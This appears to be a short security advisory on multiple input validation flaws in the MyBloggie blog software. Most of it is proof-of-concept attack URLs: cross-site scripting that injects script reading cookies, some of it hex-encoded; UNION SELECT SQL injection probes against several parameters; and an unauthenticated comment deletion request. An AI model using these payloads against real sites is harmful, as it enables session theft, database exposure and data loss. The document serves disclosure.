|
MyBloggie Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept examples are available: Cross-site scripting: http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert (document.cookies)%3C/script%3E HTML injection: http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72% 69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2 9%3C%2F%73%63%72%69%70%74%3EC http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63 %72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69% 65%29%3C%2F%73%63%72%69%70%74%3E http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72% 69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2 9%3C%2F%73%63%72%69%70%74%3E SQL injection: http://www.example.com/mybloggie/index.php?mode=search&keyword=trivero%'%20U NION%20SELECT%20null/* http://www.example.com/mybloggie/index.php?month_no=1&year=1&mode=viewdate&d ate_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,nul l/* http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=1%20UNION%20S ELECT%20null,null,null,null,null,null,null,null,null,null/* http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1%20UNION %20SELECT%20null,null,null,null,null,null,null,null,null,null/* http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1&year=1% 20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/* http://www.example.com/mybloggie/index.php?mode=viewid&post_id=1%20UNION%20S ELECT%20null,null,null,null,null,null,null,null,null,null/* Comment deletion: http://www.example.com/mybloggie/index.php?mode=delcom&comment_id=[comment_i d]&confirm=yes Alberto Trivero - codebug.org has supplied the following exploit for the SQL injection vulnerability: |
|
|
Privacy Statement |
